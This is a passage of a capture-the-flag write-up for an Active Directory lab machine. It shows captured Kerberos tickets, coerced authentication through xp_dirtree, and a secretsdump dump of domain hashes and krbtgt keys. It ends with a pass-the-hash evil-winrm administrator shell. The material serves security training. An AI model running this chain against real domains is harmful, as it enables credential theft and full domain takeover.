I3C8wQhaE3WB9ZE028H0z4j7srl7DiVgHDA51REKtkpyFw/Vi8DkjLm++D117NKGHm05uftwsqagCUbO4al/Ad28KtYcOKss5hIiqsvgpaAFqw4CvFt+NMk0+hG+igPglHRVeVx4KLUkGVtFrBpnbeBnb/s9tFptYb58esGBhO4afUluLlVKQVsjowk7PY2X+SGhp6w5bwVQvZ0Q+GRkJIm6xCvtbx1p4+FV0/5hBnI+N/cbJ3h6XvVl8SO/FODVtjbbJo612YriZYmOFMRbz0I9PM24pPHAwhaLWI1Kq+qwOEvZd+Y0Eah6a/f6CFERFZTjo+Nq4OodlIyR89oa2WVkDSC0FT7B6jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCAfYk4LDVgFy0GwcZmw37gG0johUdMPuHDtaYa1gl3IgqEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAYKEAAKURGA8yMDI1MTAwNTE0MjE1NFqmERgPMjAyNTEwMDYwMDIxNTRapxEYDzIwMjUxMDEyMTQyMTU0WqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkVYVA==
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : Administrator@DARKZERO.EXT
StartTime : 10/5/2025 7:29:42 AM
EndTime : 10/5/2025 5:29:42 PM
RenewTill : 10/12/2025 7:29:42 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
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
[*] 10/5/2025 3:38:55 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/5/2025 7:36:10 AM
EndTime : 10/5/2025 5:21:54 PM
RenewTill : 10/12/2025 7:21:54 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IEVDCCBFCgAwIBEqEDAgEBooIEQgSCBD4oCj2Peaql3hHuGQdKoVvyKnU8IeDrbBr38DiMxaHKLQ8BLRhbEWKt5kJKyDebJQI0Qu6FQcigIWTYTYyyZnIoygFDBFRKqnwss/cvd07+qEp7/8vhRLdpTFN7sFl/RSape9fNvxnrl6MUj1glfaObTsM0wQyS0iKO6baCiWiOK39jHwAbKXMzGTSVnl30oc+fcTVyKOkA7RgoD0UZia+7Ybn5dgTX98U98rDJpwzL/kfoGZktVIDt8Y+uWZXHgkfzEgITX6Y6k9CqldnxV2AWnT8iRLxalaf3o/tT1JB4WyYNAsDbNU1DFKnAocVt+8/y8I3KOsOGg/swA4nEuBZwqTNPXIAQFUOKFQ/b7soJnNkop16OqK2rYDoOsSlc/MZ7JTGOuo0Sxhd+nrOMu9zjeoASYnQrw8QOAdbNDVzPKPOJeo3kZrG5Drs5vVsTVtxSeosXg2+1K7Irp1G+M47LDNzBLjMHdOV8wEvGCiAb6lcGCx8acL5eQoMuYDHQJZQ5fUWgMJui19Nsf3sKDW4wCERB4gNbCuSV0pk6lqjYs8H3/GoGX4MurHv2QOwzO0XNmzbsmB4XT+Q8xsJ+AmiILbd2KIX7h2tIfu2MTQu1MiHs4yqQK6xEAdzKsxmNXt1GVZNzSDx1KyoDGEq9KVs2H9NckKQaRkupsVheV3+hgB8RFKkOCcDZ+8hQMmaLi5XqvRr2O2AguKKBCO5lPTTEMl7GcvKN8Lo9Zv/85yFoz9t44/G0dbx82f0eOBuvrraX8nNhvNR60Y3wH27KvbLi4/e7ApDctJ9lcKUPgfr8s0raf36vg5tvxs86J6lWxk78mNNLK74OFcpeLB53+HT3j1gV4QZZS8JGNx8hZX1M930yjC4BL7PUHPEOGMzEPv5Ji9ePDFaINh4qX1I1G26c9qrm9rm7pKDGi/xL7lYB3oINiy4LE6enoFcV71rgre/GFbCpZCJFOtCuKvIprOOjaMq5dKJ2SAmhBduZMabFBGxnDldS7I01vhGD6Yn/HFs083I3mlcmc46swu3KYuv5BRO2xZsE3kdapfofhkYMEfjH2yMvxPQWX+TsbUFWGymryM2T4v5DAJ/mw+HVcKaUBJyxCGba87T0UpWI72XlfXhhAKyf9+A06vYDplOfMPw00jJ0z03b0545bunYl72MYfEaF6ir9s7j6zHbbCJYXBHLiDb0wK23hEmrpFIsNZsL7FfxzwzahOKDhglQQd0t6BPE/rFHYOFu5fjIksv2BYtOjTlq/QZ0loOXXdltwtvozz5PcGv6QEi2awjHEZcroSOrWdMgXtruhYlrNAUzbpB2KZZ5GVlaoo5uZZd2bu6ldT+qwic4M/HshSk6xOoKqVIqMHgrKqIXyuLChXxYJaWU0Fl+BS1HJ1iCMNcF3jPqhwqEhCG4tGZOYRnMhkMmqy1ib/00RbI2f2X7ZcijgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCyQp3m3XxlTnzHPQOpUlzKTO4/Phf2EuHsXdvJiqxKmKEOGwxEQVJLWkVSTy5FWFSiEjAQoAMCAQGhCTAHGwVEQzAyJKMHAwUAQKEAAKURGA8yMDI1MTAwNTE0MzYxMFqmERgPMjAyNTEwMDYwMDIxNTRapxEYDzIwMjUxMDEyMTQyMTU0WqgOGwxEQVJLWkVSTy5FWFSpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDERBUktaRVJPLkhUQg==
[*] Ticket cache size: 6
Next, we must force DC01 to access DC02.
We can trigger a UNC enumeration from a SQL shell on DC01.
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\pwn
Then new TGS/TGT entries have been issued by the Rubeus monitor on DC02.
User : DC01$@DARKZERO.HTB
StartTime : 10/5/2025 10:46:15 AM
EndTime : 10/5/2025 8:46:14 PM
RenewTill : 10/12/2025 10:46:14 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDb/
...[snip]...
DUxNzQ2MTVaphEYDzIwMjUxMDA2MDM0NjE0WqcRGA8yMDI1MTAxMjE3NDYxNFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
Extract the Base64 blob and convert it to a usable ticket format
cat dc01.kirbi.b64 | base64 -d > dc01.kirbi
ticketConverter.py dc01.kirbi dc01.ccache
export KRB5CCNAME=dc01.ccache
Now you can use secretsdump.pyto dump all the hashes
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ secretsdump.py -k -no-pass -dc-ip dc01.darkzero.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b15a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...
Then you can use evil-winrm to get the administrator shell
┌──(wither㉿localhost)-[~/Templates/htb-labs/Hard/DarkZero]
└─$ evil-winrm -i darkzero.htb -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/5/2025 1:05 PM 34 root.txt
-ar--- 10/5/2025 1:05 PM 34 user.txt
Description
The overall challenge on this machine wasn't too great, but the main frustration was escalating privileges on the DC02 machine. I'm not sure if this is due to MSF issues or the machine itself. When using sessions to escalate privileges, I constantly encounter execution freezes and session timeouts. I understand this might be due to a race condition vulnerability, but getting stuck repeatedly is incredibly frustrating.
A possible solution might be to open multiple sessions simultaneously and then use exploit -j during the exploit execution to prevent session closures.